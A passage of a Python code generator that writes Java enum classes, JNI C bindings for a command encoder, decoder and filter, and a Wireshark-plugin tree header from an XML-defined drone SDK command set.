*/\n') jfile.write('public enum ' + CLASS_NAME + ' {\n') jfile.write(' /** Dummy value for all unknown cases */\n') jfile.write(' ' + UNKNOWN_VALUE + ' (Integer.MIN_VALUE, "Dummy value for all unknown cases"),\n') previousVal = -1 for eVal in enum.values: val = eVal.value if eVal.value is not None else previousVal +1 previousVal = int(val) jfile.write(' ') if eVal.doc: jfile.write('/** '+eVal.doc.replace('\n', ' ')+' */\n ') if eVal.doc: jfile.write(ARJavaEnumValDef(LIB_MODULE, submodule, enum.name, eVal.name, True)+ ' (' + str(val)+ ', "'+eVal.doc.replace('\n', ' ')+'")') else: jfile.write(ARJavaEnumValDef(LIB_MODULE, submodule, enum.name, eVal.name, True) + ' (' + str(val) + ')') #If it is the last value of the enum. if eVal == enum.values[-1]: jfile.write(';\n') else: jfile.write(',\n') jfile.write('\n') jfile.write(' private final int value;\n') jfile.write(' private final String comment;\n'); jfile.write(' static HashMap<Integer, ' + CLASS_NAME + '> valuesList;\n') jfile.write('\n') jfile.write(' ' + CLASS_NAME + ' (int value) {\n') jfile.write(' this.value = value;\n') jfile.write(' this.comment = null;\n') jfile.write(' }\n') jfile.write('\n') jfile.write(' ' + CLASS_NAME + ' (int value, String comment) {\n') jfile.write(' this.value = value;\n') jfile.write(' this.comment = comment;\n') jfile.write(' }\n') jfile.write('\n') jfile.write(' /**\n') jfile.write(' * Gets the int value of the enum\n') jfile.write(' * @return int value of the enum\n') jfile.write(' */\n') jfile.write(' public int getValue () {\n') jfile.write(' return value;\n') jfile.write(' }\n') jfile.write('\n') jfile.write(' /**\n') jfile.write(' * Gets the ' + CLASS_NAME + ' instance from a C enum value\n') jfile.write(' * @param value C value of the enum\n') jfile.write(' * @return The ' + CLASS_NAME + ' instance, or null if the C enum value was not valid\n') jfile.write(' */\n') jfile.write(' public static ' + CLASS_NAME + ' getFromValue (int value) {\n') jfile.write(' if (null == valuesList) {\n') jfile.write(' ' + CLASS_NAME + ' [] valuesArray = ' + CLASS_NAME + '.values ();\n') jfile.write(' valuesList = new HashMap<Integer, ' + CLASS_NAME + '> (valuesArray.length);\n') jfile.write(' for (' + CLASS_NAME + ' entry : valuesArray) {\n') jfile.write(' valuesList.put (entry.getValue (), entry);\n') jfile.write(' }\n') jfile.write(' }\n') jfile.write(' ' + CLASS_NAME + ' retVal = valuesList.get (value);\n') jfile.write(' if (retVal == null) {\n') jfile.write(' retVal = ' + UNKNOWN_VALUE + ';\n') jfile.write(' }\n') jfile.write(' return retVal;') jfile.write(' }\n') jfile.write('\n') jfile.write(' /**\n') jfile.write(' * Returns the enum comment as a description string\n') jfile.write(' * @return The enum description\n') jfile.write(' */\n') jfile.write(' public String toString () {\n') jfile.write(' if (this.comment != null) {\n') jfile.write(' return this.comment;\n') jfile.write(' }\n') jfile.write(' return super.toString ();\n') jfile.write(' }\n') jfile.write('}\n') jfile.close() def jni_generateCmds(ctx, paths): genDebug = True genTreeFilename = None projects = [DEFAULTPROJECTNAME] if not os.path.exists (paths.JNI_DIR): os.makedirs (paths.JNI_DIR) if not os.path.exists (paths.JNIC_DIR): os.makedirs (paths.JNIC_DIR) allFeatures = ctx.features # Check types used for ftr in allFeatures: for msg in ftr.getMsgs(): for arg in msg.args: if isinstance(arg.argType, ArEnum): hasArgOfType[ArArgType.ENUM] = True elif isinstance(arg.argType, ArBitfield): hasArgOfType[ArArgType.BITFIELD] = True hasArgOfType[arg.argType.btfType] = True elif isinstance(arg.argType, ArMultiSetting): hasArgOfType[ArArgType.MULTISETTING] = True else: hasArgOfType[arg.argType] = True cfile = open (paths.JNI_CFILE, 'w') JNI_FUNC_PREFIX='Java_' + JNI_PACKAGE_NAME.replace ('.', '_') + '_' JNI_FIRST_ARGS='JNIEnv *env, jobject thizz' JNI_FIRST_ARGS_STATIC='JNIEnv *env, jclass clazz' cfile.write (LICENCE_HEADER) cfile.write ('/********************************************\n') cfile.write (' * AUTOGENERATED FILE *\n') cfile.write (' * DO NOT MODIFY IT *\n') cfile.write (' * *\n') cfile.write (' * To add new commands : *\n') cfile.write (' * - Modify ../../Xml/commands.xml file *\n') cfile.write (' * - Re-run generateCommandsList.py script *\n') cfile.write (' * *\n') cfile.write (' ********************************************/\n') cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n') cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n') cfile.write ('#include <jni.h>\n') cfile.write ('#include <stdlib.h>\n') cfile.write ('\n') cfile.write ('#define TOSTRING_STRING_SIZE (1024)\n') cfile.write ('\n') cfile.write ('JNIEXPORT jstring JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIClassName + '_nativeToString (' + JNI_FIRST_ARGS + ', jlong jpdata, jint jdataSize)\n') cfile.write ('{\n') cfile.write (' jstring ret = NULL;\n') cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n') cfile.write (' char *cstr = calloc (TOSTRING_STRING_SIZE, 1);\n') cfile.write (' if (cstr == NULL)\n') cfile.write (' {\n') cfile.write (' return ret;\n') cfile.write (' }\n') cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' ((uint8_t *)(intptr_t)jpdata, jdataSize, cstr, TOSTRING_STRING_SIZE);\n') cfile.write (' if (err == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' ret = (*env)->NewStringUTF(env, cstr);\n') cfile.write (' }\n') cfile.write (' free (cstr);\n') cfile.write (' return ret;\n') cfile.write ('}\n') cfile.write ('JNIEXPORT jstring JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIClassName + '_nativeStaticToString (' + JNI_FIRST_ARGS_STATIC + ', jlong jpdata, jint jdataSize)\n') cfile.write ('{\n') cfile.write (' jstring ret = NULL;\n') cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n') cfile.write (' char *cstr = calloc (TOSTRING_STRING_SIZE, 1);\n') cfile.write (' if (cstr == NULL)\n') cfile.write (' {\n') cfile.write (' return ret;\n') cfile.write (' }\n') cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' ((uint8_t *)(intptr_t)jpdata, jdataSize, cstr, TOSTRING_STRING_SIZE);\n') cfile.write (' if (err == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' ret = (*env)->NewStringUTF(env, cstr);\n') cfile.write (' }\n') cfile.write (' free (cstr);\n') cfile.write (' return ret;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('/* END OF GENERAED CODE */\n') cfile.close () def cCallbackName (ftr, cmd): return ARFunctionName (LIB_MODULE, JNI_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'nativeCallback') def jmethodeCbName (ftr, cmd): return LIB_MODULE+ '_'+JNI_SUBMODULE+ '_'+get_ftr_old_name(ftr).upper()+ '_'+format_cmd_name(cmd).upper() + '_CB' cfile = open (paths.JNI_DECODER_CFILE, 'w') cfile.write (LICENCE_HEADER) cfile.write ('/********************************************\n') cfile.write (' * AUTOGENERATED FILE *\n') cfile.write (' * DO NOT MODIFY IT *\n') cfile.write (' * *\n') cfile.write (' * To add new commands : *\n') cfile.write (' * - Modify ../../Xml/commands.xml file *\n') cfile.write (' * - Re-run generateCommandsList.py script *\n') cfile.write (' * *\n') cfile.write (' ********************************************/\n') cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n') cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n') cfile.write ('#include <jni.h>\n') cfile.write ('#include <stdlib.h>\n') cfile.write ('\n') cfile.write ('typedef struct\n') cfile.write ('{\n') cfile.write (' jobject javaDecoder; /**< java decoder */\n') cfile.write (' ARCOMMANDS_Decoder_t *nativeDecoder; /**< native decoder*/\n') cfile.write ('} ARCOMMANDS_JNI_Decoder_t;\n') cfile.write ('\n') cfile.write ('static JavaVM *g_vm = NULL;\n') cfile.write ('static jfieldID g_dataSize_id = 0;\n') cfile.write ('\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: cfile.write ('static jmethodID ' +jmethodeCbName(ftr, cmd)+ ';\n') cfile.write ('\n') cfile.write ('JNIEXPORT jint JNICALL\n') cfile.write ('JNI_OnLoad (JavaVM *vm, void *reserved)\n') cfile.write ('{\n') cfile.write (' g_vm = vm;\n') cfile.write (' JNIEnv *env = NULL;\n') cfile.write (' if ((*vm)->GetEnv (vm, (void **)&env, JNI_VERSION_1_6) != JNI_OK)\n') cfile.write (' {\n') cfile.write (' return -1;\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' return JNI_VERSION_1_6;\n') cfile.write ('}\n') cfile.write ('JNIEXPORT void JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeStaticInit (' + JNI_FIRST_ARGS_STATIC + ')\n') cfile.write ('{\n') cfile.write (' jclass decoder_clazz = (*env)->FindClass (env, "' + JNI_PACKAGE_NAME.replace ('.', '/') + '/' + JNIDecoderClassName + '");\n') cfile.write ('\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: cfile.write (' '+jmethodeCbName(ftr, cmd)+ ' = (*env)->GetMethodID (env, decoder_clazz, "' + javaCbName (ftr, cmd) + '", "(') for arg in cmd.args: cfile.write ('' + xmlToJavaSig (ftr, cmd, arg)) cfile.write (')V");\n') cfile.write ('\n') cfile.write (' /* cleanup */\n') cfile.write (' (*env)->DeleteLocalRef (env, decoder_clazz);\n') cfile.write ('}\n') cfile.write ('JNIEXPORT jint JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeDecode (' + JNI_FIRST_ARGS + ', jlong jdecoder, jlong jpdata, jint jdataSize)\n') cfile.write ('{\n') cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = (ARCOMMANDS_JNI_Decoder_t *) (intptr_t)jdecoder;\n') cfile.write (' uint8_t *pdata = (uint8_t *) (intptr_t)jpdata;\n') cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (decoder->nativeDecoder, pdata, jdataSize);\n') cfile.write (' return err;\n') cfile.write ('}\n') cfile.write ('\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: cfile.write ('JNIEXPORT jint JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIClassName + '_nativeSet' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (' + JNI_FIRST_ARGS + ', jlong c_pdata, jint dataLen') for arg in cmd.args: if isinstance(arg.argType, ArMultiSetting): for multiset_msg in arg.argType.msgs: cfile.write (', jint '+multiset_msg.ftr.name+ multiset_msg.name+'IsSet') for multiset_msg_arg in multiset_msg.args: cfile.write (', ' + xmlToJni (multiset_msg.ftr, multiset_msg, multiset_msg_arg) + ' ' +multiset_msg.ftr.name+ multiset_msg.name+ multiset_msg_arg.name) else: cfile.write (', ' + xmlToJni (ftr, cmd, arg) + ' ' + arg.name) cfile.write (')\n') cfile.write ('{\n') cfile.write (' int32_t c_dataSize = 0;\n') cfile.write (' ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' err = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'ERROR') + ';\n'); cfile.write (' if (g_dataSize_id == 0)\n') cfile.write (' {\n') cfile.write (' jclass clz = (*env)->GetObjectClass (env, thizz);\n') cfile.write (' if (clz != 0)\n') cfile.write (' {\n') cfile.write (' g_dataSize_id = (*env)->GetFieldID (env, clz, "used", "I");\n') cfile.write (' (*env)->DeleteLocalRef (env, clz);\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' return err;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write ('\n') for arg in cmd.args: if ArArgType.STRING == arg.argType: cfile.write (' const char *c_' + arg.name + ' = (*env)->GetStringUTFChars (env, ' + arg.name + ', NULL);\n') elif isinstance(arg.argType, ArMultiSetting): cfile.write (' ' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ' c_' + arg.name + ' = {\n') for multiset_msg in arg.argType.msgs: cfile.write (' .'+multiset_msg.name+'.isSet = '+multiset_msg.ftr.name+ multiset_msg.name+'IsSet,\n') for multiset_msg_arg in multiset_msg.args: cfile.write (' .'+multiset_msg.name+'.'+multiset_msg_arg.name+' = ' +multiset_msg.ftr.name+ multiset_msg.name+ multiset_msg_arg.name+',\n') cfile.write ('};\n') cfile.write (' err = ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' ((uint8_t *) (intptr_t) c_pdata, dataLen, &c_dataSize') for arg in cmd.args: if ArArgType.STRING == arg.argType: cfile.write (', c_' + arg.name) elif isinstance(arg.argType, ArMultiSetting): cfile.write (', &c_' + arg.name) else: cfile.write (', (' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ')' + arg.name) cfile.write (');\n') for arg in cmd.args: if ArArgType.STRING == arg.argType: cfile.write (' (*env)->ReleaseStringUTFChars (env, ' + arg.name + ', c_' + arg.name + ');\n') cfile.write (' if (err == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' (*env)->SetIntField (env, thizz, g_dataSize_id, (jint)c_dataSize);\n') cfile.write (' }\n') cfile.write (' return err;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: cfile.write ('void ' + cCallbackName (ftr, cmd) + ' (') for arg in cmd.args: cfile.write (xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg, True) + ' ' + arg.name + ', ') cfile.write ('void *custom)\n') cfile.write ('{\n') cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = (ARCOMMANDS_JNI_Decoder_t *)custom;\n') cfile.write (' jint res;\n') cfile.write (' JNIEnv *env = NULL;\n') cfile.write (' res = (*g_vm)->GetEnv (g_vm, (void **)&env, JNI_VERSION_1_6);\n') cfile.write (' if (res < 0) { return; }\n') cfile.write ('\n') for arg in _get_args_multiset(cmd.args): cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE,'Decode'+ARCapitalize(ftr.name)+ARCapitalize(cmd.name))+' (decoder->nativeDecoder, '+arg.name+');\n') for arg in _get_args_without_multiset(cmd.args): if ArArgType.STRING == arg.argType: cfile.write (' jstring j_' + arg.name + ' = (*env)->NewStringUTF (env, ' + arg.name + ');\n') elif isinstance(arg.argType, ArEnum): cfile.write (' jclass j_' + arg.name + '_class = (*env)->FindClass (env, "' + jniEnumClassName (ftr, cmd, arg) + '");\n') cfile.write (' jmethodID j_' + arg.name + '_mid = (*env)->GetStaticMethodID (env, j_' + arg.name + '_class, "getFromValue", "(I)' + xmlToJavaSig(ftr, cmd, arg) + '");\n') cfile.write (' jobject j_' + arg.name + '_enum = (*env)->CallStaticObjectMethod (env, j_' + arg.name + '_class, j_' + arg.name + '_mid, ' + arg.name + ');\n') if not list(_get_args_multiset(cmd.args)): cfile.write (' (*env)->CallVoidMethod (env, decoder->javaDecoder, '+jmethodeCbName (ftr, cmd)) for arg in _get_args_without_multiset(cmd.args): if ArArgType.STRING == arg.argType: cfile.write (', j_' + arg.name) elif isinstance(arg.argType, ArEnum): cfile.write (', j_' + arg.name + '_enum') else: cfile.write (', ' + xmlToJniCast(ftr, cmd, arg) + arg.name) cfile.write (');\n') for arg in _get_args_without_multiset(cmd.args): if ArArgType.STRING == arg.argType: cfile.write (' (*env)->DeleteLocalRef (env, j_' + arg.name + ');\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('\n') cfile.write ('JNIEXPORT jlong JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeNewDecoder (' + JNI_FIRST_ARGS + ')\n') cfile.write ('{\n') cfile.write (' int failed = 0;\n') cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = calloc(1, sizeof(ARCOMMANDS_JNI_Decoder_t));\n') cfile.write (' if (decoder == NULL)\n') cfile.write (' {\n') cfile.write (' failed = 1;\n') cfile.write (' }\n') cfile.write (' \n') cfile.write (' if (!failed)\n') cfile.write (' {\n') cfile.write (' decoder->nativeDecoder = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'NewDecoder') + ' (NULL);\n') cfile.write (' if (decoder->nativeDecoder == NULL)\n') cfile.write (' {\n') cfile.write (' failed = 1;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' \n') cfile.write (' if (!failed)\n') cfile.write (' {\n') cfile.write (' decoder->javaDecoder = (*env)->NewGlobalRef(env, thizz);\n') cfile.write (' if (decoder->javaDecoder == NULL)\n') cfile.write (' {\n') cfile.write (' failed = 1;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' \n') cfile.write (' if (!failed)\n') cfile.write (' {\n') for ftr in allFeatures: for cmd in ftr.cmds + ftr.evts: cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (decoder->nativeDecoder, ' + cCallbackName (ftr, cmd) + ', decoder);\n') cfile.write ('\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' if ((failed) && (decoder != NULL))\n') cfile.write (' {\n') cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (&decoder->nativeDecoder);\n') cfile.write (' if (decoder->javaDecoder != NULL)\n') cfile.write (' {\n') cfile.write (' (*env)->DeleteGlobalRef(env, decoder->javaDecoder);\n') cfile.write (' }\n') cfile.write (' free(decoder);\n') cfile.write (' decoder = NULL;\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' return (jlong) (intptr_t) decoder;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('JNIEXPORT void JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeDeleteDecoder (' + JNI_FIRST_ARGS + ', jlong jdecoder)\n') cfile.write ('{\n') cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = (ARCOMMANDS_JNI_Decoder_t *) (intptr_t)jdecoder;\n') cfile.write ('\n') cfile.write (' if (decoder != NULL)\n') cfile.write (' {\n') cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (&decoder->nativeDecoder);\n') cfile.write (' if (decoder->javaDecoder != NULL)\n') cfile.write (' {\n') cfile.write (' (*env)->DeleteGlobalRef(env, decoder->javaDecoder);\n') cfile.write (' }\n') cfile.write (' free(decoder);\n') cfile.write (' }\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('/* END OF GENERAED CODE */\n') cfile.close () cfile = open (paths.JNI_FILTER_CFILE, 'w') cfile.write (LICENCE_HEADER) cfile.write ('/********************************************\n') cfile.write (' * AUTOGENERATED FILE *\n') cfile.write (' * DO NOT MODIFY IT *\n') cfile.write (' * *\n') cfile.write (' * To add new commands : *\n') cfile.write (' * - Modify ../../Xml/commands.xml file *\n') cfile.write (' * - Re-run generateCommandsList.py script *\n') cfile.write (' * *\n') cfile.write (' ********************************************/\n') cfile.write ('#include <' + COMMANDSFIL_HFILE_NAME + '>\n') cfile.write ('#include <jni.h>\n') cfile.write ('#include <stdlib.h>\n') cfile.write ('\n') cfile.write ('JNIEXPORT jlong JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeNewFilter(' + JNI_FIRST_ARGS + ', jint behavior)\n') cfile.write ('{\n') cfile.write (' ARCOMMANDS_Filter_t *filter = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (behavior, NULL);\n') cfile.write (' return (jlong)(intptr_t)filter;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('JNIEXPORT void JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeDeleteFilter(' + JNI_FIRST_ARGS + ', jlong cFilter)\n') cfile.write ('{\n') cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n') cfile.write (' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (&filter);\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('JNIEXPORT jint JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeFilterCommand(' + JNI_FIRST_ARGS + ', jlong cFilter, jlong cCommand, jint len)\n') cfile.write ('{\n') cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n') cfile.write (' uint8_t *command = (uint8_t *)(intptr_t)cCommand;\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' status = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (filter, command, len, NULL);\n') cfile.write (' return (jint)status;\n') cfile.write ('}\n') cfile.write ('\n') for ftr in allFeatures: cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n') cfile.write ('JNIEXPORT jint JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (' + JNI_FIRST_ARGS + ', jlong cFilter, jint behavior)\n') cfile.write ('{\n') cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' err = ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + 'Behavior (filter, behavior);\n') cfile.write (' return (jint)err;\n') cfile.write ('}\n') cfile.write ('\n') if ftr.classes:#project only for cl in ftr.classes: cfile.write (' // - Class ' + cl.name + '\n') cfile.write ('JNIEXPORT jint JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (' + JNI_FIRST_ARGS + ', jlong cFilter, jint behavior)\n') cfile.write ('{\n') cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' err = ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + 'Behavior (filter, behavior);\n') cfile.write (' return (jint)err;\n') cfile.write ('}\n') cfile.write ('\n') for cmd in ftr.cmds + ftr.evts: cfile.write ('JNIEXPORT jint JNICALL\n') cfile.write (JNI_FUNC_PREFIX + JNIFilterClassName + '_nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(format_cmd_name(cmd)) + 'Behavior (' + JNI_FIRST_ARGS + ', jlong cFilter, jint behavior)\n') cfile.write ('{\n') cfile.write (' ARCOMMANDS_Filter_t *filter = (ARCOMMANDS_Filter_t *)(intptr_t)cFilter;\n') cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' err = ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior (filter, behavior);\n') cfile.write (' return (jint)err;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('\n') cfile.write ('/* END OF GENERAED CODE */\n') # Functions for tree file generation # (Wireshark Plugin) def dump_enum_table(ftr, cl, cmd, arg): table = 'static struct arsdk_enum %s_%s_%s_%s_enum_tab[] = {\n' % (get_ftr_old_name(ftr), cl.name, cmd.name, arg.name) value = 0 for enum in arg.enums: comment = enum.doc.replace('\n', '\\n') table += ' {\n' table += ' .name = "%s",\n' % enum.name table += ' .value = %s,\n' % AREnumValue(LIB_MODULE, get_ftr_old_name(ftr).upper() + '_' + cl.name.upper(), cmd.name.upper() + '_' + arg.name.upper(), enum.name) table += ' .comment = "%s"\n' % comment.replace('"', '\\"') table += ' },\n' value += 1 table = table + '};\n' return table if arg.enums else '' def dump_arg_table(ftr, cl, cmd): table = 'static struct arsdk_arg %s_%s_%s_arg_tab[] = {\n' % (get_ftr_old_name(ftr), cl.name, cmd.name) for arg in cmd.args: comment = get_arg_doc(arg).replace('\n', '\\n') if len(arg.enums) > 0: enums = '%s_%s_%s_%s_enum_tab' % (get_ftr_old_name(ftr), cl.name, cmd.name, arg.name) nenums = 'ARRAY_SIZE(%s)' % enums else: enums = 'NULL' nenums = '0' table += ' {\n' table += ' .name = "%s",\n' % arg.name if isinstance(arg.argType, ArEnum): table += ' .type = ARSDK_ARG_TYPE_ENUM,\n' elif isinstance(arg.argType, ArBitfield): table += ' .type = ARSDK_ARG_TYPE_%s,\n' % ArArgType.TO_STRING[arg.argType.btfType].upper() else: table += ' .type = ARSDK_ARG_TYPE_%s,\n' % ArArgType.TO_STRING[arg.argType].upper() table += ' .enums = %s,\n' % enums table += ' .nenums = %s,\n' % nenums table += ' .comment = "%s"\n' % comment.replace('"', '\\"') table += ' },\n' table = table + '};\n' return table if cmd.args else '' def dump_cmd_table(ftr, cl): table = 'static struct arsdk_cmd %s_%s_cmd_tab[] = {\n' % (get_ftr_old_name(ftr), cl.name) for cmd in cl.cmds: comment = cmd.doc.title.replace('\n', '\\n') if len(cmd.args) > 0: args = '%s_%s_%s_arg_tab' % (get_ftr_old_name(ftr), cl.name, cmd.name) nargs = 'ARRAY_SIZE(%s)' % args else: args = 'NULL' nargs = '0' table += ' {\n' table += ' .name = "%s",\n' % cmd.name if cl.name == 'defaultCls': enum_val = AREnumValue(LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) else: enum_val = AREnumValue(LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) table += ' .id = %s,\n' % enum_val # ignore fields, .buf, .timeout, .listtype (are they used at all ?) table += ' .args = %s,\n' % args table += ' .nargs = %s,\n' % nargs table += ' .comment = "%s"\n' % comment.replace('"', '\\"') table += ' },\n' table = table + '};\n' return table if cl.cmds else '' def dump_class_table(ftr): table = 'static struct arsdk_class %s_class_tab[] = {\n' % get_ftr_old_name(ftr) for cl in ftr.classes: comment = cl.doc.replace('\n', '\\n') if len(cl.cmds) > 0: cmds = get_ftr_old_name(ftr) + '_' + cl.name + '_cmd_tab' ncmds = 'ARRAY_SIZE(%s)' % cmds else: cmds = 'NULL' ncmds = '0' table += ' {\n' table += ' .name = "%s",\n' % cl.name if cl.name != 'defaultCls': table += ' .ident = %s,\n' % AREnumValue(LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) else: table += ' .ident = 0,\n' table += ' .cmds = %s,\n' % cmds table += ' .ncmds = %s,\n' % ncmds table += ' .comment = "%s"\n' % comment.replace('"', '\\"') table += ' },\n' table = table + '};\n' return table if len(ftr.classes) > 0 else '' def dump_project_table(projects): table = 'static struct arsdk_project arsdk_projects[] = {\n' for proj in projects: comment = proj.doc.replace('\n', '\\n') if proj.classes and len(proj.classes) > 0: classes = get_ftr_old_name(proj) + '_class_tab' nclasses = 'ARRAY_SIZE(%s)' % classes else: classes = 'NULL' nclasses = '0' table += ' {\n' table += ' .name = "%s",\n' % get_ftr_old_name(proj) table += ' .ident = %s,\n' % AREnumValue(LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(proj)) table += ' .classes = %s,\n' % classes table += ' .nclasses = %s,\n' % nclasses table += ' .comment = "%s"\n' % comment.replace('"', '\\"') table += ' },\n' table = table + '};\n' table += 'static const unsigned int arsdk_nprojects = ' table += 'ARRAY_SIZE(arsdk_projects);\n' return table if len(projects) > 0 else '' def dump_tree_header(ctx, filename): allFeatures = ctx.features hfile = open (filename, 'w') hfile.write (LICENCE_HEADER) hfile.write ('/********************************************\n') hfile.write (' * AUTOGENERATED FILE *\n') hfile.write (' * DO NOT MODIFY *\n') hfile.write (' ********************************************/\n') hfile.write ('\n') hfile.write ('#define ARRAY_SIZE(_t) (sizeof(_t)/sizeof((_t)[0]))\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief libARCommands Tree dump.\n') hfile.write (' * @note Autogenerated file\n') hfile.write (' **/\n') hfile.write ('#ifndef _ARSDK_ARCOMMANDS_TREE_H\n') hfile.write ('#define _ARSDK_ARCOMMANDS_TREE_H\n') hfile.write ('#include <inttypes.h>\n') hfile.write ('#include <stdlib.h>\n') hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n') hfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n') hfile.write ('\n') hfile.write ('\n') hfile.write('enum arsdk_arg_type {\n') hfile.write(' ARSDK_ARG_TYPE_ENUM,\n') hfile.write(' ARSDK_ARG_TYPE_U8,\n') hfile.write(' 